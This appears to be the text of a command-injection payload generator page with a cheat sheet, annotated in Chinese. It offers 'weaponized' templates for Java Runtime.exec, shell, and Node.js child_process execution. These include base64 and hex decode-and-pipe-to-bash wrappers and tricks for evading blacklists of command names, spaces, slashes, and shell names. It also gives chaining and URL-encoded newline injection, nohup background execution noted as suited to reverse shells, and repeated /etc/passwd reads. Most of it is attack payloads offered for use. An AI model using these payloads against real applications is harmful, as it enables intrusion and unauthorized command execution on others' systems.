🔥[Java] [Linux] Brace expansion + Base64
📌用途: Runtime.exec(String) 单字符串参数
📌前提: Java环境, /bin/bash可用, base64命令存在
📌注意: Linux用 -d, 必须通过bash执行(zsh不支持)
📌回显: ❌无 (需读取Process.getInputStream())
/bin/bash -c {echo,arr0w1_base64}|{base64,-d}|bash
🔥[Java] [macOS] Brace expansion + Base64
📌用途: Runtime.exec(String) 单字符串参数
📌前提: Java环境, /bin/bash可用, base64命令存在
📌注意: macOS用 -D (大写), 必须通过bash执行(zsh不支持)
📌回显: ❌无 (需读取Process.getInputStream())
/bin/bash -c {echo,arr0w1_base64}|{base64,-D}|bash
🔥[Java] [Linux] $@ expansion
📌用途: Runtime.exec(String) 单字符串参数
📌前提: Java环境, bash可用
📌注意: 命令中不能有特殊字符 (){}[]<>|&;
📌回显: ❌无 (需读取Process.getInputStream())
/bin/bash -c $@|bash 0 echo arr0w1_cmd_origin
🔥[Java] [Linux] $* expansion
📌用途: Runtime.exec(String) 单字符串参数
📌前提: Java环境, bash可用
📌注意: 命令中不能有特殊字符 (){}[]<>|&;
📌回显: ❌无 (需读取Process.getInputStream())
/bin/bash -c $*|bash 0 echo arr0w1_cmd_origin
🔥[Java] [Linux] $0 here-string
📌用途: Runtime.exec(String) 单字符串参数
📌前提: Java环境, bash可用
📌使用here-string传递命令
📌回显: ❌无 (需读取Process.getInputStream())
/bin/bash -c $0<<<arr0w1_cmd_origin bash

🔥[Shell] [Linux] Base64 - Brace expansion (Bash Only)
📌用途: 在Bash终端执行, zsh不支持此语法!
📌前提: bash, base64命令
📌回显: ✅有 (终端直接显示输出)
{echo,arr0w1_base64}|{base64,-d}|bash
🔥[Shell] [macOS] Base64 - Brace expansion (Bash Only)
📌用途: 在Bash终端执行, zsh不支持此语法!
📌前提: bash, base64命令, macOS用 -D
📌回显: ✅有 (终端直接显示输出)
{echo,arr0w1_base64}|{base64,-D}|bash
🔥[Shell] [Linux] Base64 - echo + pipe
📌用途: 直接在终端/Shell执行
📌前提: bash/zsh, base64命令
📌回显: ✅有 (终端直接显示输出)
echo 'arr0w1_base64'|base64 -d|bash
🔥[Shell] [macOS] Base64 - echo + pipe
📌用途: 直接在终端/Shell执行
📌前提: bash/zsh, base64命令, macOS用 -D
📌回显: ✅有 (终端直接显示输出)
echo 'arr0w1_base64'|base64 -D|bash
🔥[Shell] [Linux] Base64 - bash -c wrapper
📌用途: 直接在终端/Shell执行, 或作为参数传递
📌前提: bash, base64命令
📌回显: ✅有 (终端直接显示输出)
bash -c 'echo arr0w1_base64|base64 -d|bash'
🔥[Shell] [macOS] Base64 - bash -c wrapper
📌用途: 直接在终端/Shell执行, 或作为参数传递
📌前提: bash, base64命令, macOS用 -D
📌回显: ✅有 (终端直接显示输出)
bash -c 'echo arr0w1_base64|base64 -D|bash'
🔥[Shell] [Linux/macOS] Base64 - Perl
📌用途: 直接在终端/Shell执行
📌前提: perl, MIME::Base64模块
📌回显: ✅有 (终端直接显示输出)
perl -MMIME::Base64 -e 'exec decode_base64("arr0w1_base64")'
🔥[Shell] [Linux/macOS] Base64 - Python3
📌用途: 直接在终端/Shell执行
📌前提: python3
📌回显: ✅有 (终端直接显示输出)
python3 -c "import base64,os;os.system(base64.b64decode('arr0w1_base64').decode())"
🔥[Shell] [Linux/macOS] Hex - echo|bash (推荐)
📌用途: 直接在终端/Shell执行
📌前提: bash/zsh, echo -e支持
📌优势: 支持 | & ; && || 等所有shell语法
📌回显: ✅有 (终端直接显示输出)
echo -e "arr0w1_hex_full"|bash
🔥[Shell] [Linux/macOS] Hex - eval (推荐)
📌用途: 直接在终端/Shell执行
📌前提: bash/zsh
📌优势: 支持 | & ; && || 等所有shell语法
📌回显: ✅有 (终端直接显示输出)
eval $(echo -e "arr0w1_hex_full")

🔥[Node.js] [Linux/macOS/Windows] require() - Direct
📌前提: Node.js环境
📌最简单的方式, 异步执行
📌回显: ❌无 (exec是异步的, 需要callback获取输出)
require('child_process').exec('arr0w1_cmd_origin');//
🔥[Node.js] [Linux/macOS/Windows] require() - Hex module name
📌前提: Node.js环境
📌绕过 "child_process" 字符串过滤
📌回显: ❌无 (异步执行, 需callback)
require('\x63hild_process').exec('arr0w1_cmd_origin');//
🔥[Node.js] [Linux/macOS/Windows] require() - Unicode + Hex command
📌前提: Node.js环境
📌绕过模块名和命令的字符串过滤
📌回显: ❌无 (异步执行, 需callback)
require('\u0063hild_process').exec('arr0w1_cmd_ascii2hex');//
🔥[Node.js] [Linux/macOS/Windows] require() - Base64 command
📌前提: Node.js环境
📌绕过命令内容过滤
📌回显: ❌无 (异步执行, 需callback)
require('child_process').exec(Buffer.from('arr0w1_base64','base64').toString());//
🔥[Node.js] [Linux/macOS/Windows] execSync - Synchronous
📌前提: Node.js环境
📌同步执行, 可获取输出
📌回显: ✅有 (返回Buffer, .toString()转字符串)
require('child_process').execSync('arr0w1_cmd_origin').toString();//
🔥[Node.js] [Linux/macOS] spawnSync - /bin/sh
📌前提: Node.js环境, /bin/sh可用
📌更底层的进程控制
📌回显: ✅有 (stdout属性包含输出)
require('child_process').spawnSync('/bin/sh',['-c','arr0w1_cmd_origin']).stdout.toString();//
🔥[Node.js] [Windows] spawnSync - cmd.exe
📌前提: Node.js环境, Windows系统
📌更底层的进程控制
📌回显: ✅有 (stdout属性包含输出)
require('child_process').spawnSync('cmd.exe',['/c','arr0w1_cmd_origin']).stdout.toString();//
🔥[Node.js] [Linux/macOS/Windows] global.process.mainModule
📌前提: Node.js环境
📌绕过直接require的限制
📌回显: ❌无 (异步执行, 需callback)
global.process.mainModule.require('child_process').exec('arr0w1_cmd_origin');//

═══════════════════════════════════════════════════════════════
📌回显说明: 以下Bypass技术均在Shell中直接执行
📌终端执行时 ✅有回显, 漏洞注入时取决于应用是否返回stdout
═══════════════════════════════════════════════════════════════
🔶 命令名绕过 (Bypass Command Blacklist)
═══════════════════════════════════════════════════════════════
🔥[Shell] [Linux/macOS] Single Quote - 空引号插入
📌绕过: 命令关键字黑名单 (如过滤 cat, whoami 等)
📌原理: 空单引号被shell忽略, wh''oami = whoami
📌示例: cat /etc/passwd → c''at /etc/passwd
arr0w1_sq_empty
🔥[Shell] [Linux/macOS] Single Quote - 引号包裹开头
📌绕过: 命令关键字黑名单
📌原理: 'wh'oami 中 'wh' 被原样输出后拼接
📌示例: whoami → 'who'ami
arr0w1_sq_wrap_start
🔥[Shell] [Linux/macOS] Single Quote - 引号包裹中间
📌绕过: 命令关键字黑名单
📌原理: 单引号可包裹命令任意部分
📌示例: whoami → w'hoa'mi
arr0w1_sq_wrap_mid
🔥[Shell] [Linux/macOS] Double Quote - 空引号插入
📌绕过: 命令关键字黑名单
📌原理: 空双引号被shell忽略, wh""oami = whoami
📌示例: cat /etc/passwd → c""at /etc/passwd
arr0w1_dq_empty
🔥[Shell] [Linux/macOS] Double Quote - 引号包裹开头
📌绕过: 命令关键字黑名单
📌原理: "wh"oami 中 "wh" 被原样输出后拼接
📌示例: whoami → "who"ami
arr0w1_dq_wrap_start
🔥[Shell] [Linux/macOS] Double Quote - 引号包裹中间
📌绕过: 命令关键字黑名单
📌原理: 双引号可包裹命令任意部分
📌示例: whoami → w"hoa"mi
arr0w1_dq_wrap_mid
🔥[Shell] [Linux/macOS] Backslash - 单个反斜杠
📌绕过: 命令关键字黑名单
📌原理: 反斜杠转义普通字符不改变其值, w\hoami = whoami
📌示例: cat /etc/passwd → c\at /etc/passwd
arr0w1_bs_single
🔥[Shell] [Linux/macOS] Backslash - 全字符反斜杠
📌绕过: 命令关键字黑名单 (强力混淆)
📌原理: 每个字符前都加反斜杠
📌示例: cat → c\a\t
arr0w1_bs_all
🔥[Shell] [Linux/macOS] Backtick - 空反引号插入
📌绕过: 命令关键字黑名单
📌原理: 空反引号``执行结果为空字符串
📌示例: whoami → who``ami
arr0w1_backtick_empty
🔥[Shell] [Linux/macOS] $@ - 空位置参数
📌绕过: 命令关键字黑名单
📌原理: $@ 在脚本外或无参数时展开为空
📌示例: whoami → who$@ami
arr0w1_dollar_at
🔥[Shell] [Linux/macOS] $() - 空命令替换
📌绕过: 命令关键字黑名单
📌原理: $() 内无命令时结果为空
📌示例: whoami → who$()ami
arr0w1_dollar_paren
🔥[Shell] [Linux/macOS] ${x} - 未定义变量
📌绕过: 命令关键字黑名单
📌原理: ${x} 未定义变量展开为空 (x可为任意未定义变量名)
📌示例: whoami → who${z}ami 或 who${null}ami
arr0w1_dollar_var
🔥[Shell] [Linux/macOS] Wildcard ? - 通配符匹配 (推荐)
📌绕过: 命令名/路径被过滤
📌原理: ? 匹配任意单个字符, 必须包含路径前缀!
📌注意: 单独 i? 会匹配当前目录文件报错!
📌示例: id → /???/???/i? (匹配 /usr/bin/id)
arr0w1_wildcard_question
🔥[Shell] [Linux/macOS] Wildcard * - 通配符匹配 (⚠️不推荐)
📌绕过: 命令名/路径被过滤
📌原理: * 匹配任意字符序列
📌风险: * 经常匹配多个文件导致错误!
📌示例: /usr/bin/uni* 会匹配 unifdef, uniq, units 导致执行错误命令!
📌建议: 优先使用 ? 通配符，更精确可控
arr0w1_wildcard_asterisk
🔥[Shell] [Windows] 大小写混合
📌绕过: Windows命令名过滤 (大小写不敏感)
📌原理: Windows/CMD命令不区分大小写
📌示例: whoami → WhOaMi, WHOAMI, wHoAmI
📌注意: Linux/macOS区分大小写, 此方法无效
arr0w1_cmd_random_case
═══════════════════════════════════════════════════════════════
🔶 空格绕过 (Bypass Space Filter)
═══════════════════════════════════════════════════════════════
🔥[Shell] [Linux] ${IFS} - 内部字段分隔符 (Bash Only)
📌绕过: 空格字符过滤
📌原理: Bash中${IFS}默认值包含空格, 可替代空格
📌示例: cat /etc/passwd → cat${IFS}/etc/passwd
📌注意: zsh不支持! 不能用在引号内(如awk)!
arr0w1_cmd_ifs
🔥[Shell] [Linux] $IFS - 简写形式 (Bash Only)
📌绕过: 空格字符过滤
📌原理: $IFS 等同于 ${IFS}, 更短的写法
📌示例: cat /etc/passwd → cat$IFS/etc/passwd
📌注意: zsh不支持! 不能用在引号内!
arr0w1_cmd_ifs_short
🔥[Shell] [Linux] Brace Expansion - 花括号展开 (Bash Only)
📌绕过: 空格字符过滤
📌原理: {a,b,c} 展开为 a b c, 无需空格分隔
📌示例: cat /etc/passwd → {cat,/etc/passwd}
📌示例: echo hello world → {echo,hello,world}
📌注意: zsh不支持此语法!
arr0w1_brace_expansion
🔥[Shell] [Linux/macOS] < 输入重定向 - 无空格读取文件
📌绕过: 空格过滤 (仅限文件读取场景)
📌原理: < 将文件内容作为stdin传递给命令, 无需空格
📌正确: cat</etc/passwd (等同于 cat < /etc/passwd)
📌正确: head</etc/passwd
📌正确: grep root</etc/passwd (等同于 grep root < /etc/passwd)
📌错误: ls<-la (< 不能替代命令参数中的空格!)
📌限制: 只能用于最后一个参数是文件路径的场景
arr0w1_input_redirect
═══════════════════════════════════════════════════════════════
🔶 斜杠绕过 (Bypass Slash Filter)
═══════════════════════════════════════════════════════════════
🔥[Shell] [Linux/macOS] ${HOME:0:1} - 获取斜杠字符
📌绕过: 斜杠 / 字符被过滤
📌原理: ${HOME} 通常为 /home/user, ${HOME:0:1} 提取第一个字符 /
📌示例: /etc/passwd → ${HOME:0:1}etc${HOME:0:1}passwd
arr0w1_home_slash
🔥[Shell] [Linux/macOS] ${PWD:0:1} - 获取斜杠字符(变体)
📌绕过: 斜杠 / 字符被过滤 (${HOME}被过滤时使用)
📌原理: ${PWD} 为当前目录路径, ${PWD:0:1} 提取第一个字符 /
📌示例: /etc/passwd → ${PWD:0:1}etc${PWD:0:1}passwd
arr0w1_pwd_slash
═══════════════════════════════════════════════════════════════
🔶 编码绕过 (Encoding Bypass)
═══════════════════════════════════════════════════════════════
🔥[Shell] [Linux/macOS] Hex编码 - echo|bash 执行
📌绕过: 命令/路径中特殊字符过滤
📌原理: echo -e 解释 \xNN, 管道到 bash 执行
📌注意: 必须用 |bash 或 eval, 支持 && || ;
📌示例: id && whoami → echo -e "\x69\x64..."|bash
arr0w1_hex_echo
🔥[Shell] [Linux/macOS] Hex编码 - eval执行
📌绕过: 命令/路径中特殊字符过滤
📌原理: eval 将字符串作为 shell 命令执行
📌示例: eval $(echo -e "\x69\x64")
arr0w1_hex_eval
🔥[Shell] [Linux/macOS] Hex编码 - $'...' ANSI-C引用
📌绕过: 命令/路径中特殊字符过滤
📌原理: $'...' 语法支持 \xNN 转义序列
📌陷阱: $'...' 结果是单个字符串, 不会解析 && || ; !
📌错误: $'\x69\x64\x20\x26\x26...' → "id &&..." 作为一个命令名!
📌正确: 简单命令用 $'\x69\x64', 复杂命令自动用 eval $'...'
arr0w1_hex_ansi
═══════════════════════════════════════════════════════════════
🔶 Shell执行绕过 (Shell Path Bypass)
═══════════════════════════════════════════════════════════════
🔥[Shell] [Linux/macOS] $0 - 当前Shell执行
📌绕过: bash, sh, zsh 等shell名被过滤
📌原理: $0 在交互式shell中是当前shell路径
📌示例: bash -c "whoami" → echo whoami|$0
📌用法: 通过管道将命令传给当前shell
echo arr0w1_cmd_origin|$0
🔥[Shell] [Linux/macOS] $SHELL - 环境变量执行
📌绕过: /bin/bash, /bin/sh 等路径被过滤
📌原理: $SHELL 环境变量存储用户默认shell路径
📌示例: /bin/bash -c "id" → $SHELL -c 'id'
$SHELL -c 'arr0w1_cmd_origin'
═══════════════════════════════════════════════════════════════
🔶 命令链接/注入 (Command Chaining)
═══════════════════════════════════════════════════════════════
🔥[Shell] [Linux/macOS/Windows] ; - 分号命令链接
📌用途: 命令注入
📌原理: 分号分隔多个命令, 顺序执行
📌示例: ping -c1 127.0.0.1;id (先ping后执行id)
📌注入: input;malicious_cmd
;arr0w1_cmd_origin
🔥[Shell] [Linux/macOS/Windows] | - 管道命令链接
📌用途: 命令注入
📌原理: 管道将前一命令的stdout传给后一命令的stdin
📌示例: echo "test"|base64 
📌注入: input|malicious_cmd
|arr0w1_cmd_origin
🔥[Shell] [Linux/macOS/Windows] && - AND逻辑链接
📌用途: 命令注入 (⚠️不能单独执行!)
📌原理: 仅当前一命令成功(exit 0)时执行后一命令
📌示例: ls /tmp && cat /etc/passwd (前面必须有命令)
📌注入: 在参数中注入 "valid_value && malicious_cmd"
📌错误: 直接执行 "&&cmd" 会报 parse error near &&
📌回显: ✅有 (取决于注入的命令)
&&arr0w1_cmd_origin
🔥[Shell] [Linux/macOS/Windows] || - OR逻辑链接
📌用途: 命令注入 (⚠️不能单独执行!)
📌原理: 仅当前一命令失败(exit非0)时执行后一命令
📌示例: ls /nonexistent || whoami (前面必须有命令)
📌注入: 在参数中注入 "invalid_value || malicious_cmd"
📌错误: 直接执行 "||cmd" 会报 parse error near ||
📌回显: ✅有 (取决于注入的命令)
||arr0w1_cmd_origin
🔥[Shell] [Linux/macOS/Windows] false || - 强制执行OR
📌用途: 独立执行 (✅可直接运行)
📌原理: false命令总是返回1(失败), 所以||后的命令必定执行
📌示例: false || whoami (whoami必定执行)
📌优势: 不依赖前置命令失败, 可独立使用
📌回显: ✅有 (取决于后面的命令)
false||arr0w1_cmd_origin
🔥[Shell] [Linux/macOS] $() - 命令替换注入
📌用途: 命令注入 (内联执行)
📌原理: $() 在子shell执行命令并将输出替换到当前位置
📌示例: echo $(whoami) → 输出当前用户名
📌回显: ⚠️特殊 (输出被替换到命令中, 需配合echo等显示)
$(arr0w1_cmd_origin)
🔥[Shell] [Linux/macOS] `` - 反引号命令替换
📌用途: 命令注入 (旧式语法)
📌原理: 反引号内命令被执行, 输出替换到当前位置
📌陷阱: `id` 执行后输出 uid=503... 会被当作命令执行!
📌回显: ⚠️特殊 (输出被替换, 可能报错但命令已执行, 适合盲注/OOB)
📌适用: 盲注/带外(OOB)可行, 直接回显不行
📌正确: echo `id` 或 result=`id` (将输出作为参数/赋值)
`arr0w1_cmd_origin`
═══════════════════════════════════════════════════════════════
🔶 后台/持久执行 (Background Execution)
═══════════════════════════════════════════════════════════════
🔥[Shell] [Linux/macOS] & - 后台执行
📌绕过: 命令执行超时检测
📌原理: & 使命令在后台异步执行, 立即返回
📌示例: sleep 100 → sleep 100 & (不阻塞)
📌回显: ❌无 (后台执行, 输出不返回, 适合反弹shell)
arr0w1_cmd_origin &
🔥[Shell] [Linux/macOS] nohup - 持久后台执行
📌绕过: 进程超时/SSH断开终止
📌原理: nohup 使进程忽略SIGHUP信号, 父进程退出后继续运行
📌回显: ❌无 (后台执行, 输出写入nohup.out文件)
nohup arr0w1_cmd_origin &
═══════════════════════════════════════════════════════════════
🔶 注释/终止符 (Comment/Terminator)
═══════════════════════════════════════════════════════════════
🔥[Shell] [Linux/macOS] # - 注释截断
📌用途: 截断注入点后的内容
📌原理: # 开始的内容被shell视为注释忽略
📌示例: ping $input # suffix → 注入 127.0.0.1;id # 可忽略suffix
📌用途: 移除原命令中的后续参数
arr0w1_cmd_origin #
🔥[Shell] [Linux/macOS] -- - 选项终止符
📌用途: 防止后续内容被解析为选项
📌原理: -- 后的所有内容都被视为参数而非选项
📌示例: rm -- -rf (删除名为-rf的文件)
📌用途: 确保注入的路径不被解析为选项
arr0w1_cmd_origin --
═══════════════════════════════════════════════════════════════
🔷 Web/URL 专用 (Web-Specific Bypasses)
═══════════════════════════════════════════════════════════════
🔥[Web] [Linux/macOS/Windows] Tab (%09) - 制表符替换空格
📌场景: HTTP请求、URL参数、Web表单
📌绕过: 空格字符过滤
📌原理: Tab字符(0x09)在shell中等同于空格
📌示例: cat /etc/passwd → cat%09/etc/passwd
📌注意: 需要URL编码, 直接在终端无效
arr0w1_cmd_tab
🔥[Web] [Linux/macOS/Windows] %0a - 换行符注入
📌场景: HTTP请求、URL参数
📌绕过: 命令注入过滤
📌原理: %0a 是换行符(LF)的URL编码, 换行后开始新命令
📌示例: ?cmd=whoami%0aid (先执行whoami, 再执行id)
📌注意: 需要URL编码, 直接在终端无效
arr0w1_cmd_origin%0a
🔥[Web] [Linux/macOS/Windows] %5C%0A - 反斜杠换行续行
📌场景: HTTP请求、URL参数
📌绕过: 长命令检测、单行命令限制
📌原理: %5C=反斜杠, %0A=换行, 组合表示命令续行
📌示例: cat /etc/passwd → cat%5C%0A/etc/passwd
📌注意: 需要URL编码, 直接在终端无效
arr0w1_cmd_backslash_newline

EXEC Payload Generator

Generate weaponized Command Execution payloads.

The command you want to execute:

Target Environment / 目标环境 (可多选):

Runtime: Java Node.js Shell Web/URL

OS: Linux macOS Windows

Reset / 重置

0 - Original Command

Base Command

1 - Java (String[])

java.lang.Runtime.getRuntime().exec(String[] cmdarray)

2 - Java (String)

java.lang.Runtime.getRuntime().exec("command")

3 - Shell Encoding

Base64 / Hex / Python / Perl

4 - Node.js

child_process.exec() / execSync / spawnSync

5 - PowerShell / cmd.exe

Windows command execution

6 - Filter Bypass Techniques

🔶 Shell: Command/Space/Slash/Encoding/Chaining | 🔷 Web: URL Encoding (%09/%0a/%5C%0A)

💡 Command Injection Cheat Sheet

命令链接符 (Chaining Commands)

; 分号 - 顺序执行多个命令
&& AND - 仅当前一命令成功时执行
|| OR - 仅当前一命令失败时执行
& 后台执行 - 命令在后台运行
| 管道 - 前一命令输出作为后一命令输入

空格绕过 (Bypass Without Space)

${IFS} - Internal Field Separator (Bash only, 不能用在引号内!)
{cat,/etc/passwd} - 花括号展开 (Bash only)
cat</etc/passwd - 输入重定向
%09 - Tab字符 (URL编码, Web场景)
$'cmd\x20arg' - ANSI-C Quoting

斜杠绕过 (Bypass Slash Filter)

${HOME:0:1} - 提取HOME路径第一个字符 /
${PWD:0:1} - 提取PWD路径第一个字符 /
echo . | tr '!-0' '"-1' - 用tr命令生成 /

命令名绕过 (Bypass Command Filter)

wh''oami / wh""oami - 空引号插入
w\hoami - 反斜杠插入
wh``oami - 空反引号插入
who$@ami / who$()ami - 变量/子shell插入
/???/i? - 通配符 ? (必须有路径前缀!)
/b*/i* - 通配符 * (必须有路径前缀!)
⚠️ i* 单独使用会匹配当前目录文件，报错!

编码绕过 (Encoding Bypass)

echo -e "\x69\x64"|bash - Hex + 管道执行 ✅ 支持 && || ;
eval $(echo -e "\x69\x64") - Hex + eval执行 ✅ 支持 && || ;
$'\x69\x64' - ANSI-C Hex ⚠️ 仅限简单命令!
eval $'\x69\x64...' - ANSI-C + eval ✅ 支持 && || ;
`echo -e "\x69\x64"` - ⚠️ 会执行但报错 (输出被当命令)
echo aWQ=|base64 -d|bash - Base64编码 ✅

命令替换注入 (Inside A Command)

`cmd` - 反引号命令替换
$(cmd) - $() 命令替换

⚠️ 重要限制

反引号陷阱 - `id` 会执行 id，但输出 uid=503... 会被当作命令执行，报错 "command not found"！
→ 命令会执行，但随后报错。用于盲注/带外可行，直接回显不行
Shell 关键字不能绕过 - while, do, done, if, then, fi, for 等是 shell 语法的一部分，不能用引号/反斜杠绕过!
${IFS} 不能用在单引号内 (如 awk '{print $5}' 中的空格无法替换)
Brace Expansion {cmd,arg} 仅在 Bash 有效，Zsh 不支持
Random Case wHoAmI 仅在 Windows 有效

参考: PayloadsAllTheThings - Command Injection